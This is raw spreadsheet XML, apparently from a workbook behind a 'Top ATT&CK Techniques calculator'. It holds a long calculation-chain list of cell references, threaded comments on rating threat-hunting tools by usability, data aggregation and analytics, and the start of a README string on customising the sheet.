  <c r="A474" i="1"/>
  <c r="AP442" i="1"/>
  <c r="A442" i="1"/>
  <c r="AP106" i="1"/>
  <c r="A106" i="1"/>
  <c r="AP84" i="1"/>
  <c r="A84" i="1"/>
  <c r="AP16" i="1"/>
  <c r="A16" i="1"/>
  <c r="AP60" i="1"/>
  <c r="A60" i="1"/>
  <c r="AP56" i="1"/>
  <c r="A56" i="1"/>
  <c r="AP178" i="1"/>
  <c r="A178" i="1"/>
  <c r="AP150" i="1"/>
  <c r="A150" i="1"/>
  <c r="AP412" i="1"/>
  <c r="A412" i="1"/>
  <c r="AP172" i="1"/>
  <c r="A172" i="1"/>
  <c r="AP248" i="1"/>
  <c r="A248" i="1"/>
  <c r="AP85" i="1"/>
  <c r="A85" i="1"/>
  <c r="AP300" i="1"/>
  <c r="A300" i="1"/>
  <c r="AP376" i="1"/>
  <c r="A376" i="1"/>
  <c r="AP71" i="1"/>
  <c r="A71" i="1"/>
  <c r="AP137" i="1"/>
  <c r="A137" i="1"/>
  <c r="AP125" i="1"/>
  <c r="A125" i="1"/>
  <c r="AP140" i="1"/>
  <c r="A140" i="1"/>
  <c r="AP11" i="1"/>
  <c r="A11" i="1"/>
  <c r="AP27" i="1"/>
  <c r="A27" i="1"/>
  <c r="AP203" i="1"/>
  <c r="A203" i="1"/>
  <c r="AP207" i="1"/>
  <c r="A207" i="1"/>
  <c r="AP293" i="1"/>
  <c r="A293" i="1"/>
  <c r="AP50" i="1"/>
  <c r="A50" i="1"/>
  <c r="AP13" i="1"/>
  <c r="A13" i="1"/>
  <c r="AP133" i="1"/>
  <c r="A133" i="1"/>
  <c r="AP173" i="1"/>
  <c r="A173" i="1"/>
  <c r="AP285" i="1"/>
  <c r="A285" i="1"/>
  <c r="AP53" i="1"/>
  <c r="A53" i="1"/>
  <c r="AP38" i="1"/>
  <c r="A38" i="1"/>
  <c r="AP42" i="1"/>
  <c r="A42" i="1"/>
  <c r="AP182" i="1"/>
  <c r="A182" i="1"/>
  <c r="AP212" i="1"/>
  <c r="A212" i="1"/>
  <c r="AP458" i="1"/>
  <c r="A458" i="1"/>
  <c r="AP357" i="1"/>
  <c r="A357" i="1"/>
  <c r="AP156" i="1"/>
  <c r="A156" i="1"/>
  <c r="AP40" i="1"/>
  <c r="A40" i="1"/>
  <c r="AP87" i="1"/>
  <c r="A87" i="1"/>
  <c r="AP4" i="1"/>
  <c r="A4" i="1"/>
  <c r="AP62" i="1"/>
  <c r="A62" i="1"/>
  <c r="AP438" i="1"/>
  <c r="A438" i="1"/>
  <c r="AP118" i="1"/>
  <c r="A118" i="1"/>
  <c r="AP461" i="1"/>
  <c r="A461" i="1"/>
  <c r="AP113" i="1"/>
  <c r="A113" i="1"/>
  <c r="AP19" i="1"/>
  <c r="A19" i="1"/>
  <c r="AP414" i="1"/>
  <c r="A414" i="1"/>
  <c r="AP328" i="1"/>
  <c r="A328" i="1"/>
  <c r="AP441" i="1"/>
  <c r="A441" i="1"/>
  <c r="AP276" i="1"/>
  <c r="A276" i="1"/>
  <c r="AP312" i="1"/>
  <c r="A312" i="1"/>
  <c r="AP311" i="1"/>
  <c r="A311" i="1"/>
  <c r="AP450" i="1"/>
  <c r="A450" i="1"/>
  <c r="AP37" i="1"/>
  <c r="A37" i="1"/>
  <c r="AP377" i="1"/>
  <c r="A377" i="1"/>
  <c r="AP206" i="1"/>
  <c r="A206" i="1"/>
  <c r="AP429" i="1"/>
  <c r="A429" i="1"/>
  <c r="AP117" i="1"/>
  <c r="A117" i="1"/>
  <c r="AP28" i="1"/>
  <c r="A28" i="1"/>
  <c r="AP473" i="1"/>
  <c r="A473" i="1"/>
  <c r="AP231" i="1"/>
  <c r="A231" i="1"/>
  <c r="AP234" i="1"/>
  <c r="A234" i="1"/>
  <c r="AP289" i="1"/>
  <c r="A289" i="1"/>
  <c r="AP420" i="1"/>
  <c r="A420" i="1"/>
  <c r="AP260" i="1"/>
  <c r="A260" i="1"/>
  <c r="AP8" i="1"/>
  <c r="A8" i="1"/>
  <c r="AP93" i="1"/>
  <c r="A93" i="1"/>
  <c r="AP443" i="1"/>
  <c r="A443" i="1"/>
  <c r="AP426" i="1"/>
  <c r="A426" i="1"/>
  <c r="AP20" i="1"/>
  <c r="A20" i="1"/>
  <c r="AP428" i="1"/>
  <c r="A428" i="1"/>
  <c r="AP358" i="1"/>
  <c r="A358" i="1"/>
  <c r="AP68" i="1"/>
  <c r="A68" i="1"/>
  <c r="AP409" i="1"/>
  <c r="A409" i="1"/>
  <c r="AP221" i="1"/>
  <c r="A221" i="1"/>
  <c r="AP367" i="1"/>
  <c r="A367" i="1"/>
  <c r="AP533" i="1"/>
  <c r="A533" i="1"/>
  <c r="AP526" i="1"/>
  <c r="A526" i="1"/>
  <c r="AP336" i="1"/>
  <c r="A336" i="1"/>
  <c r="AP374" i="1"/>
  <c r="A374" i="1"/>
  <c r="AP418" i="1"/>
  <c r="A418" i="1"/>
  <c r="AP347" i="1"/>
  <c r="A347" i="1"/>
  <c r="AP369" i="1"/>
  <c r="A369" i="1"/>
  <c r="AP49" i="1"/>
  <c r="A49" i="1"/>
  <c r="AP34" i="1"/>
  <c r="A34" i="1"/>
  <c r="AP149" i="1"/>
  <c r="A149" i="1"/>
  <c r="AP294" i="1"/>
  <c r="A294" i="1"/>
  <c r="AP479" i="1"/>
  <c r="A479" i="1"/>
  <c r="AP69" i="1"/>
  <c r="A69" i="1"/>
  <c r="AP169" i="1"/>
  <c r="A169" i="1"/>
  <c r="AP30" i="1"/>
  <c r="A30" i="1"/>
  <c r="AP9" i="1"/>
  <c r="A9" i="1"/>
  <c r="AP410" i="1"/>
  <c r="A410" i="1"/>
  <c r="AP10" i="1"/>
  <c r="A10" i="1"/>
  <c r="AP378" i="1"/>
  <c r="A378" i="1"/>
  <c r="AP535" i="1"/>
  <c r="A535" i="1"/>
  <c r="AP467" i="1"/>
  <c r="A467" i="1"/>
  <c r="AP413" i="1"/>
  <c r="A413" i="1"/>
  <c r="AP143" i="1"/>
  <c r="A143" i="1"/>
  <c r="AP444" i="1"/>
  <c r="A444" i="1"/>
  <c r="AP232" i="1"/>
  <c r="A232" i="1"/>
  <c r="AP80" i="1"/>
  <c r="A80" i="1"/>
  <c r="AP163" i="1"/>
  <c r="A163" i="1"/>
  <c r="AP265" i="1"/>
  <c r="A265" i="1"/>
  <c r="AP316" i="1"/>
  <c r="A316" i="1"/>
  <c r="AP158" i="1"/>
  <c r="A158" i="1"/>
  <c r="AP405" i="1"/>
  <c r="A405" i="1"/>
  <c r="AP267" i="1"/>
  <c r="A267" i="1"/>
  <c r="AP308" i="1"/>
  <c r="A308" i="1"/>
  <c r="AP389" i="1"/>
  <c r="A389" i="1"/>
  <c r="AP411" i="1"/>
  <c r="A411" i="1"/>
  <c r="AP188" i="1"/>
  <c r="A188" i="1"/>
  <c r="AP489" i="1"/>
  <c r="A489" i="1"/>
  <c r="AP445" i="1"/>
  <c r="A445" i="1"/>
  <c r="AP365" i="1"/>
  <c r="A365" i="1"/>
  <c r="AP549" i="1"/>
  <c r="A549" i="1"/>
  <c r="AP348" i="1"/>
  <c r="A348" i="1"/>
  <c r="AP401" i="1"/>
  <c r="A401" i="1"/>
  <c r="AP349" i="1"/>
  <c r="A349" i="1"/>
  <c r="AP339" i="1"/>
  <c r="A339" i="1"/>
  <c r="AP350" i="1"/>
  <c r="A350" i="1"/>
  <c r="AP415" i="1"/>
  <c r="A415" i="1"/>
  <c r="AP89" i="1"/>
  <c r="A89" i="1"/>
  <c r="AP127" i="1"/>
  <c r="A127" i="1"/>
  <c r="AP484" i="1"/>
  <c r="A484" i="1"/>
  <c r="AP469" i="1"/>
  <c r="A469" i="1"/>
  <c r="AP403" i="1"/>
  <c r="A403" i="1"/>
  <c r="AP216" i="1"/>
  <c r="A216" i="1"/>
  <c r="AP252" i="1"/>
  <c r="A252" i="1"/>
  <c r="AP320" i="1"/>
  <c r="A320" i="1"/>
  <c r="AP490" i="1"/>
  <c r="A490" i="1"/>
  <c r="AP225" i="1"/>
  <c r="A225" i="1"/>
  <c r="AP525" i="1"/>
  <c r="A525" i="1"/>
  <c r="AP579" i="1"/>
  <c r="A579" i="1"/>
  <c r="AP144" i="1"/>
  <c r="A144" i="1"/>
  <c r="AP543" i="1"/>
  <c r="A543" i="1"/>
  <c r="AP575" i="1"/>
  <c r="A575" i="1"/>
  <c r="AP436" i="1"/>
  <c r="A436" i="1"/>
  <c r="AP537" i="1"/>
  <c r="A537" i="1"/>
  <c r="AP247" i="1"/>
  <c r="A247" i="1"/>
  <c r="AP501" i="1"/>
  <c r="A501" i="1"/>
  <c r="AP174" i="1"/>
  <c r="A174" i="1"/>
  <c r="AP298" i="1"/>
  <c r="A298" i="1"/>
  <c r="AP498" i="1"/>
  <c r="A498" i="1"/>
  <c r="AP196" i="1"/>
  <c r="A196" i="1"/>
  <c r="AP446" i="1"/>
  <c r="A446" i="1"/>
  <c r="AP282" i="1"/>
  <c r="A282" i="1"/>
  <c r="AP175" i="1"/>
  <c r="A175" i="1"/>
  <c r="AP107" i="1"/>
  <c r="A107" i="1"/>
  <c r="AP233" i="1"/>
  <c r="A233" i="1"/>
  <c r="AP503" i="1"/>
  <c r="A503" i="1"/>
  <c r="AP510" i="1"/>
  <c r="A510" i="1"/>
  <c r="AP197" i="1"/>
  <c r="A197" i="1"/>
  <c r="AP547" i="1"/>
  <c r="A547" i="1"/>
  <c r="AP574" i="1"/>
  <c r="A574" i="1"/>
  <c r="AP425" i="1"/>
  <c r="A425" i="1"/>
  <c r="AP536" i="1"/>
  <c r="A536" i="1"/>
  <c r="AP507" i="1"/>
  <c r="A507" i="1"/>
  <c r="AP297" i="1"/>
  <c r="A297" i="1"/>
  <c r="AP495" i="1"/>
  <c r="A495" i="1"/>
  <c r="AP295" i="1"/>
  <c r="A295" i="1"/>
  <c r="AP524" i="1"/>
  <c r="A524" i="1"/>
  <c r="AP266" i="1"/>
  <c r="A266" i="1"/>
  <c r="AP269" i="1"/>
  <c r="A269" i="1"/>
  <c r="AP432" i="1"/>
  <c r="A432" i="1"/>
  <c r="AP546" i="1"/>
  <c r="A546" i="1"/>
  <c r="AP541" i="1"/>
  <c r="A541" i="1"/>
  <c r="AP563" i="1"/>
  <c r="A563" i="1"/>
  <c r="AP522" i="1"/>
  <c r="A522" i="1"/>
  <c r="AP573" i="1"/>
  <c r="A573" i="1"/>
  <c r="AP407" i="1"/>
  <c r="A407" i="1"/>
  <c r="AP452" i="1"/>
  <c r="A452" i="1"/>
  <c r="AP96" i="1"/>
  <c r="A96" i="1"/>
  <c r="AP184" i="1"/>
  <c r="A184" i="1"/>
  <c r="AP48" i="1"/>
  <c r="A48" i="1"/>
  <c r="AP332" i="1"/>
  <c r="A332" i="1"/>
  <c r="AP333" i="1"/>
  <c r="A333" i="1"/>
  <c r="AP296" i="1"/>
  <c r="A296" i="1"/>
  <c r="AP243" i="1"/>
  <c r="A243" i="1"/>
  <c r="AP371" i="1"/>
  <c r="A371" i="1"/>
  <c r="AP453" i="1"/>
  <c r="A453" i="1"/>
  <c r="AP165" i="1"/>
  <c r="A165" i="1"/>
  <c r="AP318" i="1"/>
  <c r="A318" i="1"/>
  <c r="AP511" i="1"/>
  <c r="A511" i="1"/>
  <c r="AP571" i="1"/>
  <c r="A571" i="1"/>
  <c r="AP331" i="1"/>
  <c r="A331" i="1"/>
  <c r="AP250" i="1"/>
  <c r="A250" i="1"/>
  <c r="AP255" i="1"/>
  <c r="A255" i="1"/>
  <c r="AP288" i="1"/>
  <c r="A288" i="1"/>
  <c r="AP480" i="1"/>
  <c r="A480" i="1"/>
  <c r="AP324" i="1"/>
  <c r="A324" i="1"/>
  <c r="AP373" i="1"/>
  <c r="A373" i="1"/>
  <c r="AP565" i="1"/>
  <c r="A565" i="1"/>
  <c r="AP440" i="1"/>
  <c r="A440" i="1"/>
  <c r="AP451" i="1"/>
  <c r="A451" i="1"/>
  <c r="AP95" i="1"/>
  <c r="A95" i="1"/>
  <c r="AP361" i="1"/>
  <c r="A361" i="1"/>
  <c r="AP486" i="1"/>
  <c r="A486" i="1"/>
  <c r="AP345" i="1"/>
  <c r="A345" i="1"/>
  <c r="AP520" i="1"/>
  <c r="A520" i="1"/>
  <c r="AP362" i="1"/>
  <c r="A362" i="1"/>
  <c r="AP166" i="1"/>
  <c r="A166" i="1"/>
  <c r="AP553" i="1"/>
  <c r="A553" i="1"/>
  <c r="AP572" i="1"/>
  <c r="A572" i="1"/>
  <c r="AP424" i="1"/>
  <c r="A424" i="1"/>
  <c r="AP562" i="1"/>
  <c r="A562" i="1"/>
  <c r="AP555" i="1"/>
  <c r="A555" i="1"/>
  <c r="AP193" i="1"/>
  <c r="A193" i="1"/>
  <c r="AP43" i="1"/>
  <c r="A43" i="1"/>
  <c r="AP322" i="1"/>
  <c r="A322" i="1"/>
  <c r="AP481" i="1"/>
  <c r="A481" i="1"/>
  <c r="AP262" i="1"/>
  <c r="A262" i="1"/>
  <c r="AP109" i="1"/>
  <c r="A109" i="1"/>
  <c r="AP273" i="1"/>
  <c r="A273" i="1"/>
  <c r="AP496" i="1"/>
  <c r="A496" i="1"/>
  <c r="AP399" i="1"/>
  <c r="A399" i="1"/>
  <c r="AP177" i="1"/>
  <c r="A177" i="1"/>
  <c r="AP423" i="1"/>
  <c r="A423" i="1"/>
  <c r="AP552" i="1"/>
  <c r="A552" i="1"/>
  <c r="AP568" i="1"/>
  <c r="A568" i="1"/>
  <c r="AP341" i="1"/>
  <c r="A341" i="1"/>
  <c r="AP392" i="1"/>
  <c r="A392" i="1"/>
  <c r="AP385" i="1"/>
  <c r="A385" i="1"/>
  <c r="AP567" i="1"/>
  <c r="A567" i="1"/>
  <c r="AP253" i="1"/>
  <c r="A253" i="1"/>
  <c r="AP139" i="1"/>
  <c r="A139" i="1"/>
  <c r="AP6" i="1"/>
  <c r="A6" i="1"/>
  <c r="AP167" i="1"/>
  <c r="A167" i="1"/>
  <c r="AP391" i="1"/>
  <c r="A391" i="1"/>
  <c r="AP210" i="1"/>
  <c r="A210" i="1"/>
  <c r="AP346" i="1"/>
  <c r="A346" i="1"/>
  <c r="AP566" i="1"/>
  <c r="A566" i="1"/>
  <c r="AP344" i="1"/>
  <c r="A344" i="1"/>
  <c r="AP554" i="1"/>
  <c r="A554" i="1"/>
  <c r="AP237" i="1"/>
  <c r="A237" i="1"/>
  <c r="AP287" i="1"/>
  <c r="A287" i="1"/>
  <c r="AP313" i="1"/>
  <c r="A313" i="1"/>
  <c r="AP204" i="1"/>
  <c r="A204" i="1"/>
  <c r="AP99" i="1"/>
  <c r="A99" i="1"/>
  <c r="AP580" i="1"/>
  <c r="A580" i="1"/>
  <c r="AP145" i="1"/>
  <c r="A145" i="1"/>
  <c r="AP544" i="1"/>
  <c r="A544" i="1"/>
  <c r="AP576" i="1"/>
  <c r="A576" i="1"/>
  <c r="AP470" i="1"/>
  <c r="A470" i="1"/>
  <c r="AP342" i="1"/>
  <c r="A342" i="1"/>
  <c r="AP499" i="1"/>
  <c r="A499" i="1"/>
  <c r="AP202" i="1"/>
  <c r="A202" i="1"/>
  <c r="AP427" i="1"/>
  <c r="A427" i="1"/>
  <c r="AP514" i="1"/>
  <c r="A514" i="1"/>
  <c r="AP421" i="1"/>
  <c r="A421" i="1"/>
  <c r="AP136" i="1"/>
  <c r="A136" i="1"/>
  <c r="AP330" i="1"/>
  <c r="A330" i="1"/>
  <c r="AP456" i="1"/>
  <c r="A456" i="1"/>
  <c r="AP434" i="1"/>
  <c r="A434" i="1"/>
  <c r="AP548" i="1"/>
  <c r="A548" i="1"/>
  <c r="AP190" i="1"/>
  <c r="A190" i="1"/>
  <c r="AP33" i="1"/>
  <c r="A33" i="1"/>
  <c r="AP153" i="1"/>
  <c r="A153" i="1"/>
  <c r="AP241" i="1"/>
  <c r="A241" i="1"/>
  <c r="AP264" i="1"/>
  <c r="A264" i="1"/>
  <c r="AP360" i="1"/>
  <c r="A360" i="1"/>
  <c r="AP302" i="1"/>
  <c r="A302" i="1"/>
  <c r="AP151" i="1"/>
  <c r="A151" i="1"/>
  <c r="AP379" i="1"/>
  <c r="A379" i="1"/>
  <c r="AP131" i="1"/>
  <c r="A131" i="1"/>
  <c r="AP504" i="1"/>
  <c r="A504" i="1"/>
  <c r="AP519" i="1"/>
  <c r="A519" i="1"/>
  <c r="AP284" i="1"/>
  <c r="A284" i="1"/>
  <c r="AP538" i="1"/>
  <c r="A538" i="1"/>
  <c r="AP416" i="1"/>
  <c r="A416" i="1"/>
  <c r="AP569" i="1"/>
  <c r="A569" i="1"/>
  <c r="AP189" i="1"/>
  <c r="A189" i="1"/>
  <c r="AP170" i="1"/>
  <c r="A170" i="1"/>
  <c r="AP497" i="1"/>
  <c r="A497" i="1"/>
  <c r="AP224" i="1"/>
  <c r="A224" i="1"/>
  <c r="AP281" i="1"/>
  <c r="A281" i="1"/>
  <c r="AP488" i="1"/>
  <c r="A488" i="1"/>
  <c r="AP353" i="1"/>
  <c r="A353" i="1"/>
  <c r="AP340" i="1"/>
  <c r="A340" i="1"/>
  <c r="AP319" i="1"/>
  <c r="A319" i="1"/>
  <c r="AP448" i="1"/>
  <c r="A448" i="1"/>
  <c r="AP370" i="1"/>
  <c r="A370" i="1"/>
  <c r="AP323" i="1"/>
  <c r="A323" i="1"/>
  <c r="AP314" i="1"/>
  <c r="A314" i="1"/>
  <c r="AP122" i="1"/>
  <c r="A122" i="1"/>
  <c r="AP384" i="1"/>
  <c r="A384" i="1"/>
  <c r="AP517" i="1"/>
  <c r="A517" i="1"/>
  <c r="AP129" i="1"/>
  <c r="A129" i="1"/>
  <c r="AP433" i="1"/>
  <c r="A433" i="1"/>
  <c r="AP551" i="1"/>
  <c r="A551" i="1"/>
  <c r="AP559" i="1"/>
  <c r="A559" i="1"/>
  <c r="AP515" i="1"/>
  <c r="A515" i="1"/>
  <c r="AP128" i="1"/>
  <c r="A128" i="1"/>
  <c r="AP130" i="1"/>
  <c r="A130" i="1"/>
  <c r="AP417" i="1"/>
  <c r="A417" i="1"/>
  <c r="AP550" i="1"/>
  <c r="A550" i="1"/>
  <c r="AP146" i="1"/>
  <c r="A146" i="1"/>
  <c r="AP545" i="1"/>
  <c r="A545" i="1"/>
  <c r="AP540" i="1"/>
  <c r="A540" i="1"/>
  <c r="AP468" i="1"/>
  <c r="A468" i="1"/>
  <c r="AP558" i="1"/>
  <c r="A558" i="1"/>
  <c r="AP245" i="1"/>
  <c r="A245" i="1"/>
  <c r="AP455" i="1"/>
  <c r="A455" i="1"/>
  <c r="AP557" i="1"/>
  <c r="A557" i="1"/>
  <c r="AP254" i="1"/>
  <c r="A254" i="1"/>
  <c r="AP502" i="1"/>
  <c r="A502" i="1"/>
  <c r="AP307" i="1"/>
  <c r="A307" i="1"/>
  <c r="AP17" i="1"/>
  <c r="A17" i="1"/>
  <c r="AP112" i="1"/>
  <c r="A112" i="1"/>
  <c r="AP191" i="1"/>
  <c r="A191" i="1"/>
  <c r="AP152" i="1"/>
  <c r="A152" i="1"/>
  <c r="AP292" i="1"/>
  <c r="A292" i="1"/>
  <c r="AP187" i="1"/>
  <c r="A187" i="1"/>
  <c r="AP154" i="1"/>
  <c r="A154" i="1"/>
  <c r="AP351" i="1"/>
  <c r="A351" i="1"/>
  <c r="AP570" i="1"/>
  <c r="A570" i="1"/>
  <c r="AP304" i="1"/>
  <c r="A304" i="1"/>
  <c r="AP240" i="1"/>
  <c r="A240" i="1"/>
  <c r="AP235" i="1"/>
  <c r="A235" i="1"/>
  <c r="AP263" i="1"/>
  <c r="A263" i="1"/>
  <c r="AP199" i="1"/>
  <c r="A199" i="1"/>
  <c r="AP135" i="1"/>
  <c r="A135" i="1"/>
  <c r="AP208" i="1"/>
  <c r="A208" i="1"/>
  <c r="AP74" i="1"/>
  <c r="A74" i="1"/>
  <c r="AP487" i="1"/>
  <c r="A487" i="1"/>
  <c r="AP462" i="1"/>
  <c r="A462" i="1"/>
  <c r="AP275" i="1"/>
  <c r="A275" i="1"/>
  <c r="AP506" i="1"/>
  <c r="A506" i="1"/>
  <c r="AP329" i="1"/>
  <c r="A329" i="1"/>
  <c r="AP395" i="1"/>
  <c r="A395" i="1"/>
  <c r="AP227" i="1"/>
  <c r="A227" i="1"/>
  <c r="AP383" i="1"/>
  <c r="A383" i="1"/>
  <c r="AP398" i="1"/>
  <c r="A398" i="1"/>
  <c r="AP301" i="1"/>
  <c r="A301" i="1"/>
  <c r="AP160" i="1"/>
  <c r="A160" i="1"/>
  <c r="AP92" i="1"/>
  <c r="A92" i="1"/>
  <c r="AP219" i="1"/>
  <c r="A219" i="1"/>
  <c r="AP244" i="1"/>
  <c r="A244" i="1"/>
  <c r="AP372" i="1"/>
  <c r="A372" i="1"/>
  <c r="AP192" i="1"/>
  <c r="A192" i="1"/>
  <c r="AP236" i="1"/>
  <c r="A236" i="1"/>
  <c r="AP239" i="1"/>
  <c r="A239" i="1"/>
  <c r="AP494" i="1"/>
  <c r="A494" i="1"/>
  <c r="AP278" i="1"/>
  <c r="A278" i="1"/>
  <c r="AP460" i="1"/>
  <c r="A460" i="1"/>
  <c r="AP408" i="1"/>
  <c r="A408" i="1"/>
  <c r="AP67" i="1"/>
  <c r="A67" i="1"/>
  <c r="AP513" i="1"/>
  <c r="A513" i="1"/>
  <c r="AP338" i="1"/>
  <c r="A338" i="1"/>
  <c r="AP57" i="1"/>
  <c r="A57" i="1"/>
  <c r="AP195" i="1"/>
  <c r="A195" i="1"/>
  <c r="AP505" i="1"/>
  <c r="A505" i="1"/>
  <c r="AP161" i="1"/>
  <c r="A161" i="1"/>
  <c r="AP229" i="1"/>
  <c r="A229" i="1"/>
  <c r="AP402" i="1"/>
  <c r="A402" i="1"/>
  <c r="AP397" i="1"/>
  <c r="A397" i="1"/>
  <c r="AP283" i="1"/>
  <c r="A283" i="1"/>
  <c r="AP404" i="1"/>
  <c r="A404" i="1"/>
  <c r="AP321" i="1"/>
  <c r="A321" i="1"/>
  <c r="AP493" i="1"/>
  <c r="A493" i="1"/>
  <c r="AP388" i="1"/>
  <c r="A388" i="1"/>
  <c r="AP251" i="1"/>
  <c r="A251" i="1"/>
  <c r="AP123" i="1"/>
  <c r="A123" i="1"/>
  <c r="AP115" i="1"/>
  <c r="A115" i="1"/>
  <c r="AP334" i="1"/>
  <c r="A334" i="1"/>
  <c r="AP103" i="1"/>
  <c r="A103" i="1"/>
  <c r="AP396" i="1"/>
  <c r="A396" i="1"/>
  <c r="AP325" i="1"/>
  <c r="A325" i="1"/>
  <c r="AP464" i="1"/>
  <c r="A464" i="1"/>
  <c r="AP366" i="1"/>
  <c r="A366" i="1"/>
  <c r="AP317" i="1"/>
  <c r="A317" i="1"/>
  <c r="AP238" i="1"/>
  <c r="A238" i="1"/>
  <c r="AP180" i="1"/>
  <c r="A180" i="1"/>
  <c r="AP485" i="1"/>
  <c r="A485" i="1"/>
  <c r="AP274" i="1"/>
  <c r="A274" i="1"/>
  <c r="AP211" i="1"/>
  <c r="A211" i="1"/>
  <c r="AP223" i="1"/>
  <c r="A223" i="1"/>
  <c r="AP63" i="1"/>
  <c r="A63" i="1"/>
  <c r="AP194" i="1"/>
  <c r="A194" i="1"/>
  <c r="AP279" i="1"/>
  <c r="A279" i="1"/>
  <c r="AP492" i="1"/>
  <c r="A492" i="1"/>
  <c r="AP491" i="1"/>
  <c r="A491" i="1"/>
  <c r="AP201" i="1"/>
  <c r="A201" i="1"/>
  <c r="AP352" i="1"/>
  <c r="A352" i="1"/>
  <c r="AP183" i="1"/>
  <c r="A183" i="1"/>
  <c r="AP72" i="1"/>
  <c r="A72" i="1"/>
  <c r="AP79" i="1"/>
  <c r="A79" i="1"/>
  <c r="AP228" i="1"/>
  <c r="A228" i="1"/>
  <c r="AP51" i="1"/>
  <c r="A51" i="1"/>
  <c r="AP359" i="1"/>
  <c r="A359" i="1"/>
  <c r="AP430" i="1"/>
  <c r="A430" i="1"/>
  <c r="AP205" i="1"/>
  <c r="A205" i="1"/>
  <c r="AP390" i="1"/>
  <c r="A390" i="1"/>
  <c r="AP356" i="1"/>
  <c r="A356" i="1"/>
  <c r="AP303" i="1"/>
  <c r="A303" i="1"/>
  <c r="AP512" i="1"/>
  <c r="A512" i="1"/>
  <c r="AP306" i="1"/>
  <c r="A306" i="1"/>
  <c r="AP179" i="1"/>
  <c r="A179" i="1"/>
  <c r="AP218" i="1"/>
  <c r="A218" i="1"/>
  <c r="AP15" i="1"/>
  <c r="A15" i="1"/>
  <c r="AP509" i="1"/>
  <c r="A509" i="1"/>
  <c r="AP463" i="1"/>
  <c r="A463" i="1"/>
  <c r="AP382" i="1"/>
  <c r="A382" i="1"/>
  <c r="AP198" i="1"/>
  <c r="A198" i="1"/>
  <c r="AP58" i="1"/>
  <c r="A58" i="1"/>
  <c r="AP246" i="1"/>
  <c r="A246" i="1"/>
  <c r="AP539" i="1"/>
  <c r="A539" i="1"/>
  <c r="AP578" i="1"/>
  <c r="A578" i="1"/>
  <c r="AP542" i="1"/>
  <c r="A542" i="1"/>
  <c r="AP435" i="1"/>
  <c r="A435" i="1"/>
  <c r="AP564" i="1"/>
  <c r="A564" i="1"/>
  <c r="AP556" i="1"/>
  <c r="A556" i="1"/>
  <c r="AP400" i="1"/>
  <c r="A400" i="1"/>
  <c r="AP482" i="1"/>
  <c r="A482" i="1"/>
  <c r="AP500" i="1"/>
  <c r="A500" i="1"/>
  <c r="AP52" i="1"/>
  <c r="A52" i="1"/>
  <c r="AP75" i="1"/>
  <c r="A75" i="1"/>
  <c r="AP220" i="1"/>
  <c r="A220" i="1"/>
  <c r="AP439" i="1"/>
  <c r="A439" i="1"/>
  <c r="AP31" i="1"/>
  <c r="A31" i="1"/>
  <c r="AP256" i="1"/>
  <c r="A256" i="1"/>
  <c r="AP364" i="1"/>
  <c r="A364" i="1"/>
  <c r="AP200" i="1"/>
  <c r="A200" i="1"/>
  <c r="AP259" i="1"/>
  <c r="A259" i="1"/>
  <c r="AP90" i="1"/>
  <c r="A90" i="1"/>
  <c r="AP98" i="1"/>
  <c r="A98" i="1"/>
  <c r="AP148" i="1"/>
  <c r="A148" i="1"/>
  <c r="AP380" i="1"/>
  <c r="A380" i="1"/>
  <c r="AP277" i="1"/>
  <c r="A277" i="1"/>
  <c r="AP39" i="1"/>
  <c r="A39" i="1"/>
  <c r="AP120" i="1"/>
  <c r="A120" i="1"/>
  <c r="AP523" i="1"/>
  <c r="A523" i="1"/>
  <c r="AP315" i="1"/>
  <c r="A315" i="1"/>
  <c r="AP483" i="1"/>
  <c r="A483" i="1"/>
  <c r="AP508" i="1"/>
  <c r="A508" i="1"/>
  <c r="AP217" i="1"/>
  <c r="A217" i="1"/>
  <c r="AP381" i="1"/>
  <c r="A381" i="1"/>
  <c r="AP521" i="1"/>
  <c r="A521" i="1"/>
  <c r="AP518" i="1"/>
  <c r="A518" i="1"/>
  <c r="AP516" i="1"/>
  <c r="A516" i="1"/>
  <c r="AP577" i="1"/>
  <c r="A577" i="1"/>
  <c r="AP561" i="1"/>
  <c r="A561" i="1"/>
  <c r="AP560" i="1"/>
  <c r="A560" i="1"/>
  <c r="AP581" i="1"/>
  <c r="A581" i="1"/>
  <c r="AP164" i="1"/>
  <c r="A164" i="1"/>
  <c r="AP65" i="1"/>
  <c r="A65" i="1"/>
  <c r="E3" i="4" l="1" a="1"/>
  <c r="E3"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tc={C8C0DA6D-81EC-4D8E-B0EB-4EDDEC5EA839}</author>
    <author>tc={EB64C9E7-13DF-417D-96BB-2AB76B32F74D}</author>
    <author>tc={0DBD9DCC-E22C-4CA6-B2A3-5FB64D883C65}</author>
  </authors>
  <commentList>
    <comment ref="C2" authorId="0" shapeId="0" xr:uid="{C8C0DA6D-81EC-4D8E-B0EB-4EDDEC5EA839}">
      <text>
        <t>[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    Ease of Use 
Response Time 
OS Coverage (Visibility)</t>
      </text>
    </comment>
    <comment ref="B5" authorId="1" shapeId="0" xr:uid="{EB64C9E7-13DF-417D-96BB-2AB76B32F74D}">
      <text>
        <t xml:space="preserve">[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    Without the right tools or processes to aggregate and make sense of all the data, your team might not be effective yet after automating a few rules/queries. Hunters might be running queries and still get a very high amount of events that still need to be analyzed.
Tools collecting/integrating the right data (NOT JUST MORE DATA) to improve the detection of an adversary technique.
</t>
      </text>
    </comment>
    <comment ref="B6" authorId="2" shapeId="0" xr:uid="{0DBD9DCC-E22C-4CA6-B2A3-5FB64D883C65}">
      <text>
        <t>[Threaded comment]
Your version of Excel allows you to read this threaded comment; however, any edits to it will get removed if the file is opened in a newer version of Excel. Learn more: https://go.microsoft.com/fwlink/?linkid=870924
Comment:
    Tools helping you leverage more than just simple outlier detection techniques. Here is where the capability of using advanced data science techniques are posible with the right libraries and plugins provided by your tools with access to your data (i.e Integration of Spark Analytics). (Remember, data science concepts such as machine learning might not be applicable to every single use case or technique that you are trying to detect). If you can validate the detection of an adversay technique by just applying basic data science techniques, then you might be already in the "Very Good" level.</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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10293" uniqueCount="4691">
  <si>
    <t xml:space="preserve">This spreadsheet is the backend for the Top ATT&amp;CK Techniques calculator. This README will explain how can you modify this spreadsheet to have the Top 10 Calculator completely customized to your needs. You should only change cells that are highlighted in yellow. Other changes could break the functionality, so do so at your own risk. </t>
  </si>
  <si>
